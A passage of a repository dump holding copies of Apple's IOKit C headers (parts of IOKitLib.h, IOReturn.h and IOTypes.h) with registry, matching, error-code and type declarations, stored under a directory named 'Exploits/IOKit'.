not large enough to contain the path. */\n\nkern_return_t\nIORegistryEntryGetPath(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_string_t path );\n\n/*! @function IORegistryEntryCopyPath\n @abstract Create a path for a registry entry.\n @discussion The path for a registry entry is returned as a CFString The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n @param entry The registry entry handle whose path to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @result An instance of CFString on success, to be released by the caller. IORegistryEntryCopyPath will fail if the entry is not attached in the plane. */\n\nCFStringRef\nIORegistryEntryCopyPath(\n io_registry_entry_t entry,\n const io_name_t plane)\n#if defined(__MAC_10_11)\n__OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0)\n#endif\n;\n\n/*! @function IORegistryEntryGetRegistryEntryID\n @abstract Returns an ID for the registry entry that is global to all tasks.\n @discussion The entry ID returned by IORegistryEntryGetRegistryEntryID can be used to identify a registry entry across all tasks. A registry entry may be looked up by its entryID by creating a matching dictionary with IORegistryEntryIDMatching() to be used with the IOKit matching functions. The ID is valid only until the machine reboots.\n @param entry The registry entry handle whose ID to look up.\n @param entryID The resulting ID.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetRegistryEntryID(\n io_registry_entry_t entry,\n uint64_t * entryID );\n\n/*! @function IORegistryEntryCreateCFProperties\n @abstract Create a CF dictionary representation of a registry entry's property table.\n @discussion This function creates an instantaneous snapshot of a registry entry's property table, creating a CFDictionary analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n @param entry The registry entry handle whose property table to copy.\n @param properties A CFDictionary is created and returned the caller on success. The caller should release with CFRelease.\n @param allocator The CF allocator to use when creating the CF containers.\n @param options No options are currently defined.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateCFProperties(\n io_registry_entry_t entry,\n CFMutableDictionaryRef * properties,\n CFAllocatorRef allocator,\n IOOptionBits options );\n\n/*! @function IORegistryEntryCreateCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n @param entry The registry entry handle whose property to copy.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options No options are currently defined.\n @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntryCreateCFProperty(\n io_registry_entry_t entry,\n CFStringRef key,\n CFAllocatorRef allocator,\n IOOptionBits options );\n\n/*! @function IORegistryEntrySearchCFProperty\n @abstract Create a CF representation of a registry entry's property.\n @discussion This function creates an instantaneous snapshot of a registry entry property, creating a CF container analogue in the caller's task. Not every object available in the kernel is represented as a CF container; currently OSDictionary, OSArray, OSSet, OSSymbol, OSString, OSData, OSNumber, OSBoolean are created as their CF counterparts.\n This function will search for a property, starting first with specified registry entry's property table, then iterating recusively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will lookup and return the value of the property, using the same semantics as IORegistryEntryCreateCFProperty. The iteration keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The registry entry at which to start the search.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param key A CFString specifying the property name.\n @param allocator The CF allocator to use when creating the CF container.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. Without this option, this method degenerates into the standard IORegistryEntryCreateCFProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children.\n @result A CF container is created and returned the caller on success. The caller should release with CFRelease. */\n\nCFTypeRef\nIORegistryEntrySearchCFProperty(\n io_registry_entry_t entry,\n const io_name_t plane,\n CFStringRef key,\n CFAllocatorRef allocator,\n IOOptionBits options ) CF_RETURNS_RETAINED;\n\n/* @function IORegistryEntryGetProperty - deprecated,\n use IORegistryEntryCreateCFProperty */\n\nkern_return_t\nIORegistryEntryGetProperty(\n io_registry_entry_t entry,\n const io_name_t propertyName,\n io_struct_inband_t buffer,\n uint32_t * size );\n\n/*! @function IORegistryEntrySetCFProperties\n @abstract Set CF container based properties in a registry entry.\n @discussion This is a generic method to pass a CF container of properties to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperties for connection based property setting. The properties are interpreted by the object.\n @param entry The registry entry whose properties to set.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperties(\n io_registry_entry_t entry,\n CFTypeRef properties );\n\n/*! @function IORegistryEntrySetCFProperty\n @abstract Set a CF container based property in a registry entry.\n @discussion This is a generic method to pass a CF container as a property to an object in the registry. Setting properties in a registry entry is not generally supported, it is more common to support IOConnectSetCFProperty for connection based property setting. The property is interpreted by the object.\n @param entry The registry entry whose property to set.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIORegistryEntrySetCFProperty(\n io_registry_entry_t entry,\n CFStringRef propertyName,\n CFTypeRef property );\n\n/*! @function IORegistryEntryGetChildIterator\n @abstract Returns an iterator over an registry entry's child entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane.\n @param entry The registry entry whose children to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param iterator The created iterator over the children of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildIterator(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_iterator_t * iterator );\n\n/*! @function IORegistryEntryGetChildEntry\n @abstract Returns the first child of a registry entry in a plane.\n @discussion This function will return the child which first attached to a registry entry in a plane.\n @param entry The registry entry whose child to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param child The first child of the registry entry, on success. The child must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetChildEntry(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_registry_entry_t * child );\n\n/*! @function IORegistryEntryGetParentIterator\n @abstract Returns an iterator over an registry entry's parent entries in a plane.\n @discussion This method creates an iterator which will return each of a registry entry's parent entries in a specified plane.\n @param entry The registry entry whose parents to iterate over.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param iterator The created iterator over the parents of the entry, on success. The iterator must be released when the iteration is finished.\n @result A kern_return_t error. */\n\nkern_return_t\nIORegistryEntryGetParentIterator(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_iterator_t * iterator );\n\n/*! @function IORegistryEntryGetParentEntry\n @abstract Returns the first parent of a registry entry in a plane.\n @discussion This function will return the parent to which the registry entry was first attached in a plane.\n @param entry The registry entry whose parent to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param parent The first parent of the registry entry, on success. The parent must be released by the caller.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetParentEntry(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_registry_entry_t * parent );\n\n/*! @function IORegistryEntryInPlane\n @abstract Determines if the registry entry is attached in a plane.\n @discussion This method determines if the entry is attached in a plane to any other entry.\n @param entry The registry entry.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @result If the entry has a parent in the plane, true is returned, otherwise false is returned. */\n\nboolean_t\nIORegistryEntryInPlane(\n io_registry_entry_t entry,\n const io_name_t plane );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * Matching dictionary creation helpers\n */\n\n/*! @function IOServiceMatching\n @abstract Create a matching dictionary that specifies an IOService class match.\n @discussion A very common matching criteria for IOService is based on its class. IOServiceMatching will create a matching dictionary that specifies any IOService of a class, or its subclasses. The class is specified by C-string name.\n @param name The class name, as a const C-string. Class matching is successful on IOService's of this class or any subclass.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceMatching(\n const char * name ) CF_RETURNS_RETAINED;\n\n/*! @function IOServiceNameMatching\n @abstract Create a matching dictionary that specifies an IOService name match.\n @discussion A common matching criteria for IOService is based on its name. IOServiceNameMatching will create a matching dictionary that specifies an IOService with a given name. Some IOServices created from the device tree will perform name matching on the standard compatible, name, model properties.\n @param name The IOService name, as a const C-string.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOServiceNameMatching(\n const char * name ) CF_RETURNS_RETAINED;\n\n/*! @function IOBSDNameMatching\n @abstract Create a matching dictionary that specifies an IOService match based on BSD device name.\n @discussion IOServices that represent BSD devices have an associated BSD name. This function creates a matching dictionary that will match IOService's with a given BSD name.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param options No options are currently defined.\n @param bsdName The BSD name, as a const char *.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIOBSDNameMatching(\n mach_port_t masterPort,\n uint32_t options,\n const char * bsdName ) CF_RETURNS_RETAINED;\n\nCFMutableDictionaryRef\nIOOpenFirmwarePathMatching(\n mach_port_t masterPort,\n uint32_t options,\n const char * path ) DEPRECATED_ATTRIBUTE;\n\n/*! @function IORegistryEntryIDMatching\n @abstract Create a matching dictionary that specifies an IOService match based on a registry entry ID.\n @discussion This function creates a matching dictionary that will match a registered, active IOService found with the given registry entry ID. The entry ID for a registry entry is returned by IORegistryEntryGetRegistryEntryID().\n @param entryID The registry entry ID to be found.\n @result The matching dictionary created, is returned on success, or zero on failure. The dictionary is commonly passed to IOServiceGetMatchingServices or IOServiceAddNotification which will consume a reference, otherwise it should be released with CFRelease by the caller. */\n\nCFMutableDictionaryRef\nIORegistryEntryIDMatching(\n uint64_t entryID ) CF_RETURNS_RETAINED;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOServiceOFPathToBSDName(mach_port_t masterPort,\n const io_name_t openFirmwarePath,\n io_name_t bsdName) DEPRECATED_ATTRIBUTE;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @typedef IOAsyncCallback0\n @abstract standard callback function for asynchronous I/O requests with\n no extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n */\ntypedef void (*IOAsyncCallback0)(void *refcon, IOReturn result);\n\n/*! @typedef IOAsyncCallback1\n @abstract standard callback function for asynchronous I/O requests with\n one extra argument beyond a refcon and result code.\n This is often a count of the number of bytes transferred\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0 Extra argument\n */\ntypedef void (*IOAsyncCallback1)(void *refcon, IOReturn result, void *arg0);\n\n/*! @typedef IOAsyncCallback2\n @abstract standard callback function for asynchronous I/O requests with\n two extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0 Extra argument\n @param arg1 Extra argument\n */\ntypedef void (*IOAsyncCallback2)(void *refcon, IOReturn result, void *arg0, void *arg1);\n\n/*! @typedef IOAsyncCallback\n @abstract standard callback function for asynchronous I/O requests with\n lots of extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param args Array of extra arguments\n @param numArgs Number of extra arguments\n */\ntypedef void (*IOAsyncCallback)(void *refcon, IOReturn result, void **args,\n uint32_t numArgs);\n\n\n/* Internal use */\n\nkern_return_t\nOSGetNotificationFromMessage(\n mach_msg_header_t * msg,\n uint32_t index,\n uint32_t * type,\n uintptr_t * reference,\n void ** content,\n vm_size_t * size );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/* Internal use */\n\nkern_return_t\nIOCatalogueSendData(\n mach_port_t masterPort,\n uint32_t flag,\n const char *buffer,\n uint32_t size );\n\nkern_return_t\nIOCatalogueTerminate(\n mach_port_t masterPort,\n uint32_t flag,\n io_name_t description );\n\nkern_return_t\nIOCatalogueGetData(\n mach_port_t masterPort,\n uint32_t flag,\n char **buffer,\n uint32_t *size );\n\nkern_return_t\nIOCatalogueModuleLoaded(\n mach_port_t masterPort,\n io_name_t name );\n\n/* Use IOCatalogueSendData(), with kIOCatalogResetDrivers, to replace catalogue\n * rather than emptying it. Doing so keeps instance counts down by uniquing\n * existing personalities.\n */\nkern_return_t\nIOCatalogueReset(\n mach_port_t masterPort,\n uint32_t flag );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// obsolete API\n\n#if !defined(__LP64__)\n\n// for Power Mgt\n\ntypedef struct IOObject IOObject;\n\n// for MacOS.app\n\nkern_return_t\nIORegistryDisposeEnumerator(\n io_enumerator_t enumerator ) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nIOMapMemory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t intoTask,\n vm_address_t * atAddress,\n vm_size_t * ofSize,\n uint32_t flags ) DEPRECATED_ATTRIBUTE;\n\n// for CGS\n\nkern_return_t\nIOCompatibiltyNumber(\n mach_port_t connect,\n uint32_t * objectNumber ) DEPRECATED_ATTRIBUTE;\n\n// Traditional IOUserClient transport routines\nkern_return_t\nIOConnectMethodScalarIScalarO(\n io_connect_t connect,\n uint32_t index,\n IOItemCount scalarInputCount,\n IOItemCount scalarOutputCount,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureO(\n io_connect_t connect,\n uint32_t index,\n IOItemCount scalarInputCount,\n IOByteCount * structureSize,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureI(\n io_connect_t connect,\n uint32_t index,\n IOItemCount scalarInputCount,\n IOByteCount structureSize,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodStructureIStructureO(\n io_connect_t connect,\n uint32_t index,\n IOItemCount structureInputSize,\n IOByteCount * structureOutputSize,\n void * inputStructure,\n void * ouputStructure ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\n// Compatability with earlier Mig interface routines\n#if IOCONNECT_NO_32B_METHODS\n\nkern_return_t\nio_connect_map_memory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t intoTask,\n vm_address_t *atAddress,\n vm_size_t *ofSize,\n IOOptionBits options) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_unmap_memory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t fromTask,\n vm_address_t atAddress) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_scalarO(\n mach_port_t connection,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_scalar_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureO(\n mach_port_t connection,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureI(\n mach_port_t connection,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t inputStruct,\n mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_structureI_structureO(\n mach_port_t connection,\n int selector,\n io_struct_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_scalarO(\n mach_port_t connection,\n mach_port_t wake_port,\n io_async_ref_t reference,\n mach_msg_type_number_t referenceCnt,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_scalar_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureO(\n mach_port_t connection,\n mach_port_t wake_port,\n io_async_ref_t reference,\n mach_msg_type_number_t referenceCnt,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureI(\n mach_port_t connection,\n mach_port_t wake_port,\n io_async_ref_t reference,\n mach_msg_type_number_t referenceCnt,\n int selector,\n io_scalar_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t inputStruct,\n mach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_structureI_structureO(\n mach_port_t connection,\n mach_port_t wake_port,\n io_async_ref_t reference,\n mach_msg_type_number_t referenceCnt,\n int selector,\n io_struct_inband_t input,\n mach_msg_type_number_t inputCnt,\n io_struct_inband_t output,\n mach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n#endif // IOCONNECT_NO_32B_METHODS\n\n#endif /* defined(__LP64__) */\n\n__END_DECLS\n\n#endif /* ! _IOKIT_IOKITLIB_H */\n" }, { "path": "Exploits/IOKit/IOReturn.h", "content": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n */\n\n/*\n * Core IOReturn values. Others may be family defined.\n */\n\n#ifndef __IOKIT_IORETURN_H\n#define __IOKIT_IORETURN_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n \n#include \n \n typedef kern_return_t IOReturn;\n \n#ifndef sys_iokit\n#define sys_iokit err_system(0x38)\n#endif /* sys_iokit */\n#define sub_iokit_common err_sub(0)\n#define sub_iokit_usb err_sub(1)\n#define sub_iokit_firewire err_sub(2)\n#define sub_iokit_block_storage err_sub(4)\n#define sub_iokit_graphics err_sub(5)\n#define sub_iokit_networking err_sub(6)\n#define sub_iokit_bluetooth err_sub(8)\n#define sub_iokit_pmu err_sub(9)\n#define sub_iokit_acpi err_sub(10)\n#define sub_iokit_smbus err_sub(11)\n#define sub_iokit_ahci err_sub(12)\n#define sub_iokit_powermanagement err_sub(13)\n#define sub_iokit_hidsystem err_sub(14)\n#define sub_iokit_scsi err_sub(16)\n#define sub_iokit_usbaudio err_sub(17)\n //#define sub_iokit_pccard err_sub(21)\n#define sub_iokit_thunderbolt err_sub(29)\n#define sub_iokit_graphics_acceleration err_sub(30)\n#define sub_iokit_keystore err_sub(31)\n#define sub_iokit_platform err_sub(0x2A)\n#define sub_iokit_audio_video err_sub(0x45)\n#define sub_iokit_cec err_sub(0x46)\n#define sub_iokit_baseband err_sub(0x80)\n#define sub_iokit_HDA err_sub(0xFE)\n#define sub_iokit_hsic err_sub(0x147)\n#define sub_iokit_sdio err_sub(0x174)\n#define sub_iokit_wlan err_sub(0x208)\n#define sub_iokit_appleembeddedsleepwakehandler err_sub(0x209)\n \n#define sub_iokit_vendor_specific err_sub(-2)\n#define sub_iokit_reserved err_sub(-1)\n \n#define iokit_common_err(return) (sys_iokit|sub_iokit_common|return)\n#define iokit_family_err(sub,return) (sys_iokit|sub|return)\n#define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)\n \n#define kIOReturnSuccess KERN_SUCCESS // OK\n#define kIOReturnError iokit_common_err(0x2bc) // general error\n#define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory\n#define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage\n#define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC\n#define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device\n#define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation\n#define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument\n#define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked\n#define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked\n#define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and\n // device already open\n#define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages\n // had different msg_id\n#define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function\n#define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure\n#define kIOReturnInternalError iokit_common_err(0x2c9) // internal error\n#define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error\n //#define kIOReturn???Error iokit_common_err(0x2cb) // ???\n#define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock\n#define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open\n#define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported\n#define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported\n#define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error\n#define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error\n#define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open\n#define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure\n#define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure\n#define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy\n#define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout\n#define kIOReturnOffline iokit_common_err(0x2d7) // device offline\n#define kIOReturnNotReady iokit_common_err(0x2d8) // not ready\n#define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached\n#define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left\n#define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data\n //#define kIOReturn???Error iokit_common_err(0x2dc) // ???\n#define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists\n#define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down\n // physical memory\n#define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached\n#define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued\n#define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received\n // on interrupt port\n#define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted\n#define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device\n#define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present\n#define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted\n#define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode\n#define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun\n#define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun\n#define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly!\n#define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required\n#define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted\n#define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded\n#define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding\n#define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past!\n#define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future\n#define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found\n#define kIOReturnInvalid iokit_common_err(0x1) // should never be seen\n \n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IORETURN_H */\n" }, { "path": "Exploits/IOKit/IOTypes.h", "content": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n *\n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n *\n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n *\n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef __IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#include \n#include \n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n \n#ifndef NULL\n#if defined (__cplusplus)\n#define NULL 0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n \n /*\n * Simple data types.\n */\n#include \n#define OSTYPES_K64_REV 2\n \n typedef unsigned int UInt;\n typedef signed int SInt;\n \n \n typedef UInt32 IOOptionBits;\n typedef SInt32 IOFixed;\n typedef UInt32 IOVersion;\n typedef UInt32 IOItemCount;\n typedef UInt32 IOCacheMode;\n \n typedef UInt32 IOByteCount32;\n typedef UInt64 IOByteCount64;\n \n typedef UInt32 IOPhysicalAddress32;\n typedef UInt64 IOPhysicalAddress64;\n typedef UInt32 IOPhysicalLength32;\n typedef UInt64 IOPhysicalLength64;\n \n#if !defined(__arm__) && !defined(__i386__)\n typedef mach_vm_address_t IOVirtualAddress;\n#else\n typedef vm_address_t IOVirtualAddress;\n#endif\n \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n typedef IOByteCount64 IOByteCount;\n#else\n typedef IOByteCount32 IOByteCount;\n#endif\n \n typedef IOVirtualAddress IOLogicalAddress;\n \n#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))\n \n typedef IOPhysicalAddress64 IOPhysicalAddress;\n typedef IOPhysicalLength64 IOPhysicalLength;\n#define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize 64\n \n#else\n \n typedef IOPhysicalAddress32 IOPhysicalAddress;\n typedef IOPhysicalLength32 IOPhysicalLength;\n#define IOPhysical32( hi, lo ) (lo)\n#define IOPhysSize 32\n \n#endif\n \n \n typedef struct\n {\n IOPhysicalAddress address;\n IOByteCount length;\n } IOPhysicalRange;\n \n typedef struct\n {\n IOVirtualAddress address;\n IOByteCount length;\n } IOVirtualRange;\n \n#if !defined(__arm__) && !defined(__i386__)\n typedef IOVirtualRange IOAddressRange;\n#else\n typedef struct\n {\n mach_vm_address_t address;\n mach_vm_size_t length;\n } IOAddressRange;\n#endif\n \n /*\n * Map between #defined or enum'd constants and text description.\n */\n typedef struct {\n int value;\n const char *name;\n } IONamedValue;\n \n \n /*\n * Memory alignment -- specified as a power of two.\n */\n typedef unsigned int IOAlignment;\n \n#define IO_NULL_VM_TASK ((vm_task_t)0)\n \n \n /*\n * Pull in machine specific stuff.\n */\n \n //#include \n \n#ifndef 